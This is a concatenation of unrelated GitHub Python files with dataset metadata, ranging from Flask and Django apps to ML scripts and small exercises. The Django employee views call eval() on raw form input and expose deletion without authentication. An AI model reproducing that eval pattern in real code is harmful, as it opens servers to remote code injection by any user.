tables\nBase.prepare(engine, reflect=True)\n\n# Save reference to the table\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n\n#################################################\n# Flask Routes\n#################################################\n\n@app.route(\"/\")\ndef welcome():\n \"\"\"List all available api routes.\"\"\"\n return (\n f\"Available Routes:
<br/><br/>\"\n\t    f\"Precipitation Readings<br/>\"\n        f\"/api/v1.0/precipitation<br/><br/>\"\n\t    f\"List of Stations<br/>\"\n        f\"/api/v1.0/stations<br/><br/>\"\n\t    f\"Temperature Observations (tobs)<br/>\"\n        f\"/api/v1.0/tobs<br/><br/>\"\n        f\"Minimum, average, and maximum temperature for a given date.<br/>\"\n        f\"/api/v1.0/start (YYYY-MM-DD)<br/><br/>\"\n        f\"Minimum, average, and maximum temperature for a given start to end date.<br/>\"\n        f\"/api/v1.0/start/end (YYYY-MM-DD)\"\n    )\n\n\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n\n    session = Session(engine)\n    results = session.query(Measurement.date, Measurement.prcp).order_by(Measurement.date.asc()).all()\n    session.close()\n\n    measurement_date = [result[0] for result in results]\n    measurement_prcp = [result[1] for result in results]\n    precipitation_dict = dict(zip(measurement_date, measurement_prcp))\n\n    return jsonify(precipitation_dict)\n\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n\n    session = Session(engine)\n    results = session.query(Measurement.station).all()\n    session.close()\n\n    measurement_stat = [result[0] for result in results]\n    measurement_stat_unique = np.unique(measurement_stat).tolist()\n\n    return jsonify(measurement_stat_unique)\n\n\n@app.route(\"/api/v1.0/tobs\")\ndef temp_obs():\n\n    session = Session(engine)\n\n    last_date = session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n    last_date = last_date[0]\n    last_date = dt.datetime.strptime(last_date, '%Y-%m-%d').date()\n    year_ago = last_date - dt.timedelta(days=365)\n\n    temps = session.query(Measurement.tobs).filter(Measurement.date >= year_ago).all()\n\n    temp_list = []\n\n    for i in temps:\n        temp_list.append(i[0])\n\n    return jsonify(temp_list)\n\n    \n@app.route(\"/api/v1.0/<start>\")\ndef start(start):\n\n    session = Session(engine)\n    start_query = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).filter(Measurement.date >= start).all()\n    session.close()\n\n    start_list = []\n\n    startDict = {}\n    startDict[\"Minimum\"] = start_query[0][0]\n    startDict[\"Average\"] = start_query[0][1]\n    startDict[\"Maximum\"] = start_query[0][2]\n    start_list.append(startDict)\n\n    return jsonify(start_list)\n\n\n@app.route(\"/api/v1.0/<start>/<end>\")\ndef start_end_temp(start, end):\n\n    session = Session(engine)\n    start_end_query = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).filter(Measurement.date >= start).filter(Measurement.date <= end).all()\n    session.close()\n\n    start_end_list = []\n    \n    start_end_dict = {}\n    start_end_dict[\"Minimum\"] = start_end_query[0][0]\n    start_end_dict[\"Average\"] = start_end_query[0][1]\n    start_end_dict[\"Maximum\"] = start_end_query[0][2]\n    start_end_list.append(start_end_dict)\n\n    return jsonify(start_end_list) \n\nif __name__ == '__main__':\n    app.run(debug=True)","repo_name":"neilhsu70/sqlalchemy-challenge","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"73828737747","text":"import logging\nimport os\nfrom collections import namedtuple\n\nimport pandas as pd\nimport pytest\n\nfrom oemof import solph as solph\nfrom oemof.solph import processing\nfrom oemof.solph import views\n\n\nclass Label(namedtuple(\"solph_label\", [\"tag1\", \"tag2\", \"tag3\"])):\n    __slots__ = ()\n\n    def __str__(self):\n        return \"_\".join(map(str, self._asdict().values()))\n\n\ndef test_label():\n    my_label = Label(\"arg\", 5, None)\n    assert str(my_label) == \"arg_5_None\"\n    assert repr(my_label) == \"Label(tag1='arg', tag2=5, tag3=None)\"\n\n\ndef test_tuples_as_labels_example(\n    filename=\"storage_investment.csv\", solver=\"cbc\"\n):\n    logging.info(\"Initialize the energy system\")\n    date_time_index = pd.date_range(\"1/1/2012\", periods=40, freq=\"H\")\n\n    energysystem = solph.EnergySystem(\n        timeindex=date_time_index,\n
infer_last_interval=True,\n )\n\n full_filename = os.path.join(os.path.dirname(__file__), filename)\n data = pd.read_csv(full_filename, sep=\",\")\n\n # Buses\n bgas = solph.buses.Bus(label=Label(\"bus\", \"natural_gas\", None))\n bel = solph.buses.Bus(label=Label(\"bus\", \"electricity\", \"\"))\n energysystem.add(bgas, bel)\n\n # Sinks\n energysystem.add(\n solph.components.Sink(\n label=Label(\"sink\", \"electricity\", \"excess\"),\n inputs={bel: solph.flows.Flow()},\n )\n )\n\n energysystem.add(\n solph.components.Sink(\n label=Label(\"sink\", \"electricity\", \"demand\"),\n inputs={\n bel: solph.flows.Flow(fix=data[\"demand_el\"], nominal_value=1)\n },\n )\n )\n\n # Sources\n energysystem.add(\n solph.components.Source(\n label=Label(\"source\", \"natural_gas\", \"commodity\"),\n outputs={\n bgas: solph.flows.Flow(\n nominal_value=194397000 * 400 / 8760, full_load_time_max=1\n )\n },\n )\n )\n\n energysystem.add(\n solph.components.Source(\n label=Label(\"renewable\", \"electricity\", \"wind\"),\n outputs={\n bel: solph.flows.Flow(fix=data[\"wind\"], nominal_value=1000000)\n },\n )\n )\n\n energysystem.add(\n solph.components.Source(\n label=Label(\"renewable\", \"electricity\", \"pv\"),\n outputs={\n bel: solph.flows.Flow(\n fix=data[\"pv\"],\n nominal_value=582000,\n )\n },\n )\n )\n\n # Converter\n energysystem.add(\n solph.components.Converter(\n label=Label(\"pp\", \"electricity\", \"natural_gas\"),\n inputs={bgas: solph.flows.Flow()},\n outputs={\n bel: solph.flows.Flow(nominal_value=10e10, variable_costs=50)\n },\n conversion_factors={bel: 0.58},\n )\n )\n\n # Investment storage\n energysystem.add(\n solph.components.GenericStorage(\n label=Label(\"storage\", \"electricity\", \"battery\"),\n nominal_storage_capacity=204685,\n inputs={bel: solph.flows.Flow(variable_costs=10e10)},\n outputs={bel: solph.flows.Flow(variable_costs=10e10)},\n loss_rate=0.00,\n initial_storage_level=0,\n invest_relation_input_capacity=1 / 6,\n invest_relation_output_capacity=1 / 6,\n inflow_conversion_factor=1,\n outflow_conversion_factor=0.8,\n )\n )\n\n # Solve model\n om = solph.Model(energysystem)\n om.solve(solver=solver)\n energysystem.results[\"main\"] = processing.results(om)\n energysystem.results[\"meta\"] = processing.meta_results(om)\n\n # Check dump and restore\n energysystem.dump()\n es = solph.EnergySystem()\n es.restore()\n\n # Results\n results = es.results[\"main\"]\n meta = es.results[\"meta\"]\n\n electricity_bus = views.node(results, \"bus_electricity_\")\n my_results = electricity_bus[\"sequences\"].sum(axis=0).to_dict()\n storage = es.groups[\"storage_electricity_battery\"]\n storage_node = views.node(results, storage)\n my_results[\"max_load\"] = (\n storage_node[\"sequences\"]\n .max()[[((storage, None), \"storage_content\")]]\n .iloc[0]\n )\n commodity_bus = views.node(results, \"bus_natural_gas_None\")\n\n gas_usage = commodity_bus[\"sequences\"][\n ((\"source_natural_gas_commodity\", \"bus_natural_gas_None\"), \"flow\")\n ]\n\n my_results[\"gas_usage\"] = gas_usage.sum()\n\n stor_invest_dict = {\n \"gas_usage\": 1304112,\n \"max_load\": 0,\n ((\"bus_electricity_\", \"sink_electricity_demand\"), \"flow\"): 8239764,\n ((\"bus_electricity_\", \"sink_electricity_excess\"), \"flow\"): 22036732,\n ((\"bus_electricity_\", \"storage_electricity_battery\"), \"flow\"): 0,\n ((\"pp_electricity_natural_gas\", \"bus_electricity_\"), \"flow\"): 756385,\n ((\"renewable_electricity_pv\", \"bus_electricity_\"), \"flow\"): 744132,\n ((\"renewable_electricity_wind\", \"bus_electricity_\"), 
\"flow\"): 28775978,\n (\n (\n \"storage_electricity_battery\",\n \"bus_electricity_\",\n ),\n \"flow\",\n ): 0,\n }\n\n for key in stor_invest_dict.keys():\n assert my_results[key] == pytest.approx(stor_invest_dict[key])\n\n # Solver results\n assert str(meta[\"solver\"][\"Termination condition\"]) == \"optimal\"\n assert meta[\"solver\"][\"Error rc\"] == 0\n assert str(meta[\"solver\"][\"Status\"]) == \"ok\"\n\n # Problem results\n assert int(meta[\"problem\"][\"Lower bound\"]) == 37819254\n assert int(meta[\"problem\"][\"Upper bound\"]) == 37819254\n assert meta[\"problem\"][\"Number of variables\"] == 280\n assert meta[\"problem\"][\"Number of constraints\"] == 162\n assert meta[\"problem\"][\"Number of nonzeros\"] == 116\n assert meta[\"problem\"][\"Number of objectives\"] == 1\n assert str(meta[\"problem\"][\"Sense\"]) == \"minimize\"\n\n # Objective function\n assert meta[\"objective\"] == pytest.approx(37819254, abs=0.5)\n","repo_name":"oemof/oemof-solph","sub_path":"tests/test_scripts/test_solph/test_storage_investment/test_storage_with_tuple_label.py","file_name":"test_storage_with_tuple_label.py","file_ext":"py","file_size_in_byte":5915,"program_lang":"python","lang":"en","doc_type":"code","stars":255,"dataset":"github-code","pt":"48"} +{"seq_id":"70848498385","text":"from selenium import webdriver\r\nimport pandas as pd\r\n\r\nday = 3\r\nday_to_xpath = {\r\n 3: '//*[@id=\"post-20928\"]/div/div/table[1]/tbody',\r\n 4: '//*[@id=\"post-20948\"]/div/div/div[1]/table[1]/tbody',\r\n 5: '//*[@id=\"post-20986\"]/div/div/table[1]/tbody',\r\n 6: '//*[@id=\"post-21004\"]/div/div/table[1]/tbody',\r\n 8: '//*[@id=\"post-21053\"]/div/div/table[1]/tbody',\r\n 9: '//*[@id=\"post-21056\"]/div/div/table[1]/tbody',\r\n 10: '//*[@id=\"post-21076\"]/div/div/table[1]/tbody',\r\n 11: '//*[@id=\"post-21085\"]/div/div/table[1]/tbody',\r\n 12: '//*[@id=\"post-21095\"]/div/div/table[1]/tbody',\r\n 13: '//*[@id=\"post-21106\"]/div/div/table[1]/tbody',\r\n 14: '//*[@id=\"post-21113\"]/div/div/table[1]/tbody',\r\n 15: '//*[@id=\"post-21150\"]/div/div/table[1]/tbody',\r\n 16: '//*[@id=\"post-21169\"]/div/div/table[1]/tbody',\r\n 18: '//*[@id=\"post-21193\"]/div/div/table[1]/tbody',\r\n 19: '//*[@id=\"post-21198\"]/div/div/table[1]/tbody',\r\n 20: '//*[@id=\"post-21205\"]/div/div/table[1]/tbody',\r\n 21: '//*[@id=\"post-21210\"]/div/div/table[1]/tbody',\r\n 22: '//*[@id=\"post-21244\"]/div/div/table[1]/tbody',\r\n 23: '//*[@id=\"post-21260\"]/div/div/table[1]/tbody',\r\n 24: '//*[@id=\"post-21267\"]/div/div/table[1]/tbody'\r\n}\r\n\r\nbrowser = webdriver.Chrome()\r\nURL = \"https://www.mai.gov.ro/informare-covid-19-grupul-de-comunicare-strategica-\" + str(day) + \\\r\n \"-aprilie-2020-ora-13-00/\"\r\nbrowser.get(URL)\r\n\r\nmain_header = [\"Nr. crt.\", \"Judet\", \"Numar de cazuri confirmate \" + str(day) + \" Aprilie\"]\r\n\r\ninfo = browser.find_element_by_xpath(day_to_xpath[day]).text.split('\\n')\r\ninfo.remove(info[0])\r\n\r\nfor i in range(len(info)):\r\n info[i] = info[i].split(\" \")\r\ninfo[41][1] = \"Mun. 
Bucuresti\"\r\ninfo[31][1] = \"Satu Mare\"\r\ninfo[41].remove(info[41][2])\r\ninfo[31].remove(info[31][2])\r\ninfo[42] = ['', 'TOTAL', info[42][40]]\r\n\r\nday += 1\r\nbrowser.close()\r\n\r\nwhile day < 25:\r\n if day == 7 or day == 17:\r\n day += 1\r\n\r\n browser = webdriver.Chrome()\r\n URL = \"https://www.mai.gov.ro/informare-covid-19-grupul-de-comunicare-strategica-\" + str(day) + \\\r\n \"-aprilie-2020-ora-13-00/\"\r\n\r\n browser.get(URL)\r\n main_header.append(\"Numar de cazuri confirmate \" + str(day) + \" Aprilie\")\r\n\r\n data = browser.find_element_by_xpath(day_to_xpath[day]).text.split('\\n')\r\n data.remove(data[0])\r\n\r\n if day == 4 or day == 23 or day == 24:\r\n data.remove(data[42])\r\n\r\n for i in range(len(data)):\r\n data[i] = data[i].split(\" \")\r\n\r\n data[41][1] = \"Mun. Bucuresti\"\r\n data[31][1] = \"Satu Mare\"\r\n data[41].remove(data[41][2])\r\n data[31].remove(data[31][2])\r\n data[42] = ['', 'TOTAL', data[42][40]]\r\n\r\n cases = []\r\n for i in range(len(data)):\r\n cases.append(data[i][2])\r\n\r\n for i in range(len(info)):\r\n info[i].append(cases[i])\r\n\r\n day += 1\r\n browser.close()\r\n\r\ndf = pd.DataFrame(info, columns=main_header)\r\ndf.to_excel('Tema.xls', index=0)\r\ndf.to_html('Tema.html', index=0, encoding=\"utf-8\")\r\n","repo_name":"alinparaschiv0107/Python_Google","sub_path":"curs4_Tema.py","file_name":"curs4_Tema.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35558433283","text":"#문자열 포매팅 : 문자열을 정리하는 것\n#'{인덱스0},{인덱스1}'.format(값0,값1)\nname = '홍길동'\nage = 30\nf'나의 이름은 {name}입니다. 나이는 {age}입니다.'\nf'나는 내년이면 {age+1}살이 된다.'\nd = {'name' : '홍길동', 'age' : 30}\nf'나의 이름은 {d[\"name\"]}입니다. 나이는 {d[\"age\"]}입니다.'\nf'{\"hi\":<10}'\n\nf'{\"hi\":>10}'\n\nf'{\"hi\":^10}'\n\nf'{\"hi\":=^10}'\n\nf'{\"hi\":! 
10}'\n\ny = 3.42134234\nf'{y:0.4f}'\n\n#f문자열에서 {}문자를 표시하려면서 두개를 동시에 사용\nf'{{ and }}'\n\n#'!!!python!!!'\nf'{\"python\":!^12}'\n\n#문자열 관련 함수\n#문자 개수 세기(count함수)\na = \"hobby\"\na.count('b')\n#위치를 알려주기 1(find)\na = \"Python is the best choice\"\na.find('b')\na.find('k')\n#위치를 알려주기 2(index)\na = \"Life is too short\"\na.index('t')\na.index('k')\n#find 함수와 indx 함수의 다른 점 : 문자열 안에 존재하지 않는 문자를 찾으면 오류가 발생\n\n#문자열 삽입(join)\n\",\".join('abcd')\n\n#소문자를 대문자로 바꾸기 (upper)\na = \"hi\"\na.upper()\n\n#대문자를 소문자로 바꾸기(lower)\na=\"HI\"\na.lower()\n#왼쪽 공백 지우기(lstrip)\na=\"hi\"\na.lstrip()\n#오른쪽 공백 지우기(rstrip)\na=\"hi\"\na.rstrip()\n#양쪽 공백 지우기(strip)\na = \"hi\"\na.strip()\n#문자열 바꾸기(replace)\na = \"Life is too short\"\na.replace(\"short\", \"long\")\n#문자열 나누기(split)\na = \"Life is too short.\"\na.split()\n ","repo_name":"yeyae/Python12","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21850378897","text":"from bisect import bisect_left\n\nn = input() # target\nm = int(input())\nnormal = list(set(range(10)) - set(map(int, input().split()))) # 정상 버튼\n# 숫자 버튼 -> +, - 버튼\ntemp = \"\"\nfor i in n:\n i = int(i)\n if i not in normal:\n # normal인 수 중에서 가장 가까운 수\n a = bisect_left(normal, i)\n if a == len(normal):\n temp += str(normal[a-1])\n elif a == 0:\n temp += str(normal[a])\n else:\n if abs(normal[a-1]-i) <= abs(normal[a-i]):\n temp += str(normal[a-1])\n else:\n temp += str(normal[a])\n else:\n temp += str(i)\n\nif len(temp) + abs(int(temp) - int(n)) <= abs(int(n)-100):\n print(len(temp) + abs(int(temp) - int(n)))\nelse:\n print(abs(int(n)-100))\n\n\n","repo_name":"bhyun/daily-algorithm","sub_path":"2021/BOJ1107_리모컨.py","file_name":"BOJ1107_리모컨.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71158410065","text":"from django.shortcuts import render ,HttpResponse\r\nfrom emp_app.models import Role,Employee,Department\r\nfrom datetime import datetime\r\n\r\nfrom django.db.models import Q\r\n\r\ndef index(request):\r\n return render(request,'index.html')\r\n\r\ndef view_emp(request):\r\n emps=Employee.objects.all()\r\n context={\r\n 'emps':emps\r\n }\r\n print(context)\r\n\r\n return render(request,'view_emp.html',context)\r\n\r\ndef add_emp(request):\r\n\r\n if request.method==\"POST\":\r\n first_name=request.POST.get(\"first_name\")\r\n last_name=request.POST.get(\"last_name\")\r\n dept=eval(request.POST.get(\"dept\"))\r\n role=eval(request.POST.get(\"role\"))\r\n salary=eval(request.POST.get(\"salary\"))\r\n bonus=eval(request.POST.get(\"bonus\"))\r\n phone=eval(request.POST.get(\"phone\"))\r\n\r\n # cur.execute(\"insert into emp_app_employee (first_name,last_name,salary,bonus,phone,hire_date,dept_id,role_id values('\"+first_name+\"','\"+last_name+\"','\"+salary+\"','\"+bonus+\"','\"+phone+\"','\"+hire_date+\"','\"+dept+\"','\"+role+\"');\")\r\n # db.commit()\r\n print(\"added\")\r\n # db.close()\r\n\r\n\r\n new_ep=Employee(first_name=first_name,last_name=last_name,dept_id=dept,role_id=role,salary=salary,bonus=bonus,phone=phone,hire_date=datetime.now())\r\n new_ep.save()\r\n return HttpResponse(\"
Employee Added Successfully
\")\r\n\r\n elif request.method==\"GET\":\r\n return render(request,'add_emp.html')\r\n\r\n else:\r\n return HttpResponse(\"An error occur\")\r\n\r\ndef remove_emp(request,emp_id=0):\r\n if emp_id:\r\n try:\r\n emp_rem=Employee.objects.get(id=emp_id)\r\n \r\n emp_rem.delete()\r\n return HttpResponse(\"Employee Removed successfully\")\r\n except:\r\n return HttpResponse(\"Error\")\r\n emps=Employee.objects.all()\r\n context={\r\n \"emp\":emps\r\n }\r\n\r\n\r\n return render(request,'remove_emp.html',context)\r\n\r\ndef fil_emp(request):\r\n if request.method==\"POST\":\r\n name=request.POST.get(\"name\")\r\n dept=request.POST.get(\"dept\")\r\n role=request.POST.get(\"role\")\r\n\r\n emps=Employee.objects.all()\r\n\r\n if name:\r\n emps=emps.filter(Q(first_name__icontains = name) | Q(last_name__icontains=name))\r\n\r\n if dept:\r\n emps=emps.filter(Q(dept__name__icontains=dept))\r\n\r\n if role:\r\n emps=emps.filter(Q(role__name__icontains=role))\r\n\r\n context={\r\n \"emps\":emps\r\n }\r\n return render(request,\"view_emp.html\",context)\r\n elif request.method==\"GET\":\r\n return render(request,'fil_emp.html')\r\n\r\n# Create your views here.\r\n","repo_name":"Codingboat21/Office-Employee-management-system","sub_path":"office_emp_proj/office_emp_proj/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13552691844","text":"# *******************************************************************************\n# **\n# ** Author: Michael Lomnitz (mrlomnitz@lbl.gov) \n# ** Python module to run word embedding (word2vec) using skipgram or continuos\n# ** bag of words (CBOW) models. Output is then plotted using SKlearn tSNE \n# ** for visualization.\n# **\n# *******************************************************************************\n# Load modules\nimport tensorflow as tf\nimport numpy as np\nimport random\nfrom matplotlib import pylab\nfrom sklearn.manifold import TSNE\n# Local modules\nimport Load_Text_Set as ld\nimport tf_Word2Vec as w2v\n# plotting amcro\ndef plot(embeddings, labels, name):\n assert embeddings.shape[0] >= len(labels), 'More labels than embeddings'\n fig = pylab.figure(figsize=(15,15)) # in inches\n for i, label in enumerate(labels):\n x, y = embeddings[i,:]\n pylab.scatter(x, y)\n pylab.annotate(label, xy=(x, y), xytext=(5, 2), textcoords='offset points',\n ha='right', va='bottom')\n #pylab.show()\n fig.savefig('./'+name+'.pdf')\n\n# Model constants \nbatch_size = 128 # Training batch. Reduces overtraining and training time\nskip_window = 1 # How many words to consider left and right.\nnum_skips = 2 # How many times to reuse an input to generate a label.\n# Cosmntruct random validation sample from the loaded dataset. Limit ourselves\n# to a sample of words that have a low numeric ID, which by (i.e. 
frequent)\nvalid_size = 16 # Random set of words to evaluate similarity on.\nvalid_window = 100 # Only pick dev samples in the head of the distribution.\nvalid_examples = np.array(random.sample(range(valid_window), valid_size))\nvocabulary_size = 200000\n# Switch betweenskipgram and CBOW models\nuse_CBOW = True\n#\ngraph = tf.Graph()\nwords = ld.text_8(vocabulary_size)\n#\ndef run_embeddings():\n with graph.as_default(), tf.device('/cpu:0'):\n # Input data.\n if use_CBOW == False:\n train_dataset = tf.placeholder(tf.int32, shape=[batch_size])\n else: \n train_dataset = tf.placeholder(tf.int32, shape=[batch_size,num_skips])\n train_labels = tf.placeholder(tf.int32, shape=[batch_size, 1])\n valid_dataset = tf.constant(valid_examples, dtype=tf.int32)\n #\n embeddings = w2v.word_embedding(vocabulary_size, use_CBOW)\n optimizer,loss = embeddings.train(train_dataset, train_labels)\n \n num_steps = 100001\n\n with tf.Session(graph=graph) as session:\n tf.global_variables_initializer().run()\n print('Initialized')\n average_loss = 0\n for step in range(num_steps):\n if use_CBOW == False:\n batch_data, batch_labels = w2v.generate_batch(\n batch_size, num_skips, skip_window, words.data)\n else:\n batch_data, batch_labels = w2v.generate_batch_CBOW(\n batch_size, num_skips, skip_window, words.data)\n #\n feed_dict = {train_dataset : batch_data, train_labels : batch_labels}\n _, l = session.run([optimizer, loss], feed_dict=feed_dict)\n average_loss += l\n # The followign are just to keep track of the training and the performance\n if step % 2000 == 0:\n if step > 0:\n average_loss = average_loss / 2000\n # The average loss is an estimate of the loss over the last 2000 batches.\n print('Average loss at step %d: %f' % (step, average_loss))\n average_loss = 0\n # note that this is expensive (~20% slowdown if computed every 500 steps)\n if step % 10000 == 0:\n #sim = similarity.eval()\n sim = embeddings.similarity(valid_dataset)\n for i in range(valid_size):\n valid_word = words.reverse_dictionary[valid_examples[i]]\n top_k = 8 # number of nearest neighbors\n nearest = (-sim[i, :]).argsort()[1:top_k+1]\n log = 'Nearest to %s:' % valid_word\n for k in range(top_k):\n close_word = words.reverse_dictionary[nearest[k]]\n log = '%s %s,' % (log, close_word)\n print(log)\n final_embeddings = embeddings.normalized_embeddings.eval()\n return(final_embeddings)\n# plot output results\n","repo_name":"CDIPS-AI-2017/pensieve","sub_path":"Notebooks/word2vec/run_Word2Vec.py","file_name":"run_Word2Vec.py","file_ext":"py","file_size_in_byte":4391,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41463529289","text":"import copy\n\n\nstart_time = 30\nstart_valve = 'AA'\n\n\ndef complete(valves):\n num_valves = len(valves)\n is_complete = False\n while not is_complete:\n is_complete = True\n for key, valve in valves.items():\n new_edges = {}\n for neighbor, cost in valve['edges'].items():\n if neighbor in new_edges:\n new_edges[neighbor] = min(cost, new_edges[neighbor])\n else:\n new_edges[neighbor] = cost\n for edge, added_cost in valves[neighbor]['edges'].items():\n if edge == key:\n continue\n if edge in new_edges:\n new_edges[edge] = min(cost + added_cost, new_edges[edge])\n else:\n new_edges[edge] = cost + added_cost\n valve['edges'] = new_edges\n if len(new_edges) < num_valves - 1:\n is_complete = False\n\n\ndef clean(valves, starter_costs):\n baddies = [name for name, valve in valves.items() if valve['rate'] == 0]\n for baddie in baddies:\n del 
valves[baddie]\n del starter_costs[baddie]\n for valve in valves.values():\n for baddie in baddies:\n del valve['edges'][baddie]\n\n\ndef find_starter_costs(valves):\n costs = copy.deepcopy(valves[start_valve]['edges'])\n costs[start_valve] = 0\n return costs\n\n\ndef score(valves, starter_costs, candidate):\n costs = starter_costs\n time = start_time\n score = 0\n for name in candidate:\n time -= costs[name] + 1\n if time <= 0:\n break\n score += time * valves[name]['rate']\n costs = valves[name]['edges']\n return score\n\n\ndef search(valves, time, costs, current=[]):\n yield current\n for name, cost in costs.items():\n if name in current:\n continue\n if time - cost - 1 > 0:\n candidates = search(valves, time - cost - 1, valves[name]['edges'], current + [name])\n if candidates is not None:\n for candidate in candidates:\n yield candidate\n\n\ndef solve(valves):\n complete(valves)\n starter_costs = find_starter_costs(valves)\n clean(valves, starter_costs)\n # example = ['DD', 'BB', 'JJ', 'HH', 'EE', 'CC']\n best_score = 0\n i = 0\n # for candidate in itertools.permutations(valves.keys()):\n for candidate in search(valves, start_time, starter_costs):\n i += 1\n value = score(valves, starter_costs, candidate)\n if value > best_score:\n best_score = value\n print(f'{i}: {best_score}')\n print(f'iterations: {i}')\n return best_score\n\n\ndef read(path):\n with open(path, 'r') as f:\n rows = [row.rstrip() for row in f.readlines()]\n nodes = {}\n for row in rows:\n parts = row.split(' ')\n name = parts[1]\n rate = int(parts[4][5:-1])\n edges = {edge.rstrip(','): 1 for edge in parts[9:]} \n nodes[name] = {\n 'name': name,\n 'rate': rate,\n 'edges': edges,\n }\n return nodes\n\n\ndef main(path, is_test):\n data = read(path)\n return solve(data)\n\n\ndef display(output):\n print('\\n')\n try:\n iterator = iter(output)\n except TypeError:\n print(output)\n pass\n else:\n for line in iterator:\n print(line)\n\n\nif __name__ == \"__main__\":\n is_test = False\n import os\n dirname = os.path.realpath(os.path.dirname(__file__))\n filename = 'test.txt' if is_test else 'input.txt'\n path = f'{dirname}/{filename}'\n import sys\n\n if (len(sys.argv) < 2):\n display(main(path, is_test=is_test))\n else:\n for f in sys.argv[1:]:\n display(main(f))\n","repo_name":"slovb/aoc-2022","sub_path":"Day16/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":3779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38386893043","text":"import numpy as np\n\ndef convert_to_np_array(dataset, split_name):\n \"\"\"\n Function that converts images and labels in TFRecords into separate NumPy arrays\n\n Args:\n dataset (int): The TFRecord containing both images and their associated image labels\n split_name (str): the data split the function is being invoked for\n\n Returns:\n x_cassava: NumPy array of images\n y_cassava: NumPy array of image labels\n \"\"\"\n\n #get the number of images in dataset\n num_images = len(dataset)\n\n #created empty vectors to populate\n #x_cassava = np.empty([num_images, img_size, img_size, 3], dtype='float32')\n y_cassava = np.empty(num_images, dtype='float32')\n\n #populate the above vectors\n counter = 0\n for image, label in dataset: \n #x_cassava[counter] = data[\"image\"]\n #y_cassava[counter] = data[\"label\"]\n #x_cassava[counter] = image\n y_cassava[counter] = label\n counter += 1\n\n if counter == num_images:\n print('All {} images and labels converted to NumPy arrays'.format(split_name))\n\n return 
y_cassava","repo_name":"liamcarew/cassava-leaf-disease-classification","sub_path":"image_pre_processing/utils/convert_to_np_array.py","file_name":"convert_to_np_array.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27712878815","text":"import torch\nfrom diffusers import DiffusionPipeline\n\ndef genSingle(pipeline: DiffusionPipeline, prompt: str | None = None, width: int = 512, height: int = 512, samples: int = 50, negativePrompt: str | None = None):\n image = pipeline(prompt=prompt, negative_prompt=negativePrompt, width=width, height=height, num_inference_steps=samples).images[0]\n if torch.cuda.is_available():\n torch.cuda.empty_cache()\n return image\n\ndef genMultiple(pipeline: DiffusionPipeline, prompt: str | None = None, negativePrompt: str | None = None, width: int = 512, height: int = 512, samples: int = 50, count: int = 10):\n images = []\n for i in range(count):\n images.append(genSingle(pipeline, prompt, width, height, samples, negativePrompt))\n return images","repo_name":"Cr0me1ve/easyStableDiffusionXL","sub_path":"scripts/runSD.py","file_name":"runSD.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40358864649","text":"from PyQt6.QtWidgets import (\n QMainWindow,\n QLabel,\n QSpinBox,\n QPushButton,\n QTableWidget,\n)\nfrom project.form.constants import (\n WIDTH,\n HEIGHT,\n LEFT,\n)\nfrom project.form.base_object import Object\n\n\nclass MainWindow(QMainWindow):\n\n def __init__(self):\n super(MainWindow, self).__init__()\n self.setWindowTitle(\"Simulation: Discrete-event modeling\")\n self.setGeometry(350, 300, WIDTH, HEIGHT)\n\n self.obj: Object = Object()\n self.create_objects()\n\n def create_objects(self):\n labels: list[str] = ['Number of operators', 'Average customers', 'Service scale']\n for label in labels:\n self.obj.set_obj(\n object=QLabel(self),\n title=label,\n above=self.obj.indent,\n case=0,\n )\n\n self.obj.add_obj(\n self.obj.set_obj(\n object=QSpinBox(self),\n above=self.obj.indent,\n left=LEFT * 10,\n step=1,\n span=[0, 100000000],\n value=5,\n ),\n key='spinbox',\n )\n self.obj.increase_indent()\n self.obj.increase_indent()\n\n self.obj.add_obj(\n self.obj.set_obj(\n object=QPushButton(self),\n title='Start/Stop',\n above=self.obj.indent,\n left=LEFT * 3,\n ),\n key='button',\n )\n self.obj.add_obj(\n self.obj.set_obj(\n object=QTableWidget(),\n columns=4,\n title='Bank simulation',\n values=['event type', 'event time', 'queue', 'free operators'],\n width=WIDTH,\n ),\n key='table',\n )\n","repo_name":"BigBlackBob-93/Simulation--DiscreteEventModeling--Queue","sub_path":"project/form/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2821603969","text":"# Starting with a clean slate\n\nfrom modal import Secret, Stub, Image, gpu, method\n\nARTFUSION_GITHUB_PATH = \"https://github.com/cadolphs/ArtFusion.git\"\nARTFUSION_PATH = \"/git/artfusion/\"\nMODEL_DIR = \"/models\"\nMODEL_NAME = \"artfusion_r12_step=317673.ckpt\"\nBASE_MODEL = \"lagerbaer/artfusion\"\nCKPT_PATH = f\"{MODEL_DIR}/{MODEL_NAME}\"\nCFG_PATH = f\"{ARTFUSION_PATH}/configs/kl16_content12.yaml\"\nDEVICE = \"cuda\"\n\nstub = Stub(\"art-fusion\")\n\n\ndef 